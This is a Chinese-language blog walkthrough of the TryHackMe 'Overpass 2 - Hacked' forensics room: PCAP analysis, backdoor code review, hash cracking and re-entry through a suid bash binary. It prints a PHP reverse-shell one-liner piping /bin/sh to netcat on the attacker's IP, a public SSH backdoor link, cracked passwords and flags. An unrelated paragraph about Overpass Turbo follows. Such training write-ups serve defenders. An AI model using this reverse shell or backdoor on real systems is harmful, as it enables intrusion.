tryhackme--Overpass 2 - Hacked


日常一篇博客~~~~

今天分享的是tryhackme的一道取证题。

Task 1 -Forensics - Analyse the PCAP

#1 What was the URL of the page they used to upload a reverse shell?

查看http数据包,我们从请求和响应可以知道攻击者的ip:192.168.170.145,服务器的ip:192.168.170.159,并且/development/目录上还有一个upload.php,故答案

/development/

在这里插入图片描述

#2 What payload did the attacker use to gain access?

搜索关键字符,发现payload.php,TCP追踪流查看具体发包数据

在这里插入图片描述
攻击者利用upload.php新上传了一个payload.php,从内容上看是一个反弹shell
在这里插入图片描述

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

#3 What password did the attacker use to privesc?

继续查看该payload执行了什么命令,TCP追踪流,

在这里插入图片描述
该用户从www切换到james用户,密码为:

whenevernoteartinstant

在这里插入图片描述

#4 How did the attacker establish persistence?

继续查看攻击者的攻击命令,发现james可以以任何用户执行任何命令,这个属于配置上的错误。往下看攻击者先是看了/etc/passwd文件,再从github上面下载了一个ssh后门并安装执行。
在这里插入图片描述

https://github.com/NinjaJc01/ssh-backdoor

#5 Using the fasttrack wordlist, how many of the system passwords were crackable?

该服务器一共有5个用户,攻击者现在已经知道james用户的密码,只需破解剩下四个用户的密码即可,在kali使用john爆破也可以。
在这里插入图片描述
在这里插入图片描述

4

Task 2 Research - Analyse the code

#1 What’s the default hash for the backdoor?

查看mian.go
在这里插入图片描述

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

#2 What’s the hardcoded salt for the backdoor?

求该hash算法的盐
在这里插入图片描述

1c362db832f3f864c8c2fe05f2002a05

#3 What was the hash that the attacker used? - go back to the PCAP for this!

在这里插入图片描述

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

通过算法我们可以知道密码加盐加密成hash,即

SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'

在这里插入图片描述
接下来我们用hashcat爆破密码

在这里插入图片描述

在这里插入图片描述

november16

Task 3 Attack - Get back in!

#1 The attacker defaced the website. What message did they leave as a heading?

访问http服务
在这里插入图片描述

H4ck3d by CooctusClan

#3 What’s the user flag?

用ssh后门登录服务器,在james在家目录找到user.txt

在这里插入图片描述

在这里插入图片描述

thm{d119b4fa8c497ddb0525f7ad200e6567}

#3 What’s the root flag?

发现一个可疑的suid文件,/home/james/.suid_bash
在这里插入图片描述
bash命令的提权方法,不过这个是二进制文件直接执行就好了。
在这里插入图片描述

执行拿到flag
在这里插入图片描述

thm{d53b2684f169360bb9606c333873144d}

ps:

个人站点博客:XingHe,欢迎来踩~

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Overpass Turbo是一个在线的地理信息系统工具,用于查询和可视化OpenStreetMap(开放街图)的数据。它通过使用Overpass API(一种基于HTTP的接口)来获取OpenStreetMap的数据,并以交互式和可视化的方式呈现查询结果。 使用Overpass Turbo,我们可以执行各种查询操作,以获取我们需要的地理数据。比如,我们可以根据地理位置、标签、关键词等条件来查询OpenStreetMap中的点、线、面等地理要素。这些查询可以是简单的,比如查找某个特定地点的信息,也可以是复杂的,比如查找某个区域内特定类型的设施。 Overpass Turbo提供了一个直观友好的用户界面,让我们可以轻松地构建查询并实时预览查询结果。我们可以使用简单的操作来缩放、平移地图,以便更好地查看查询结果。此外,Overpass Turbo还提供了一些功能强大的过滤器,可以帮助我们根据特定的标签和属性来筛选查询结果,从而更好地满足我们的需求。 除了查询和可视化功能,Overpass Turbo还提供了一些其他实用的功能。例如,我们可以将查询结果导出为GeoJSON、KML等格式,方便我们在其他地理信息系统中使用。我们还可以保存和分享我们的查询和可视化结果,以便与他人合作或记录我们的工作。 总的来说,Overpass Turbo是一个功能强大且易于使用的工具,可以帮助我们查询和可视化OpenStreetMap的数据。无论是专业的地理信息系统专家还是普通用户,都可以通过使用Overpass Turbo来满足他们的地理信息需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值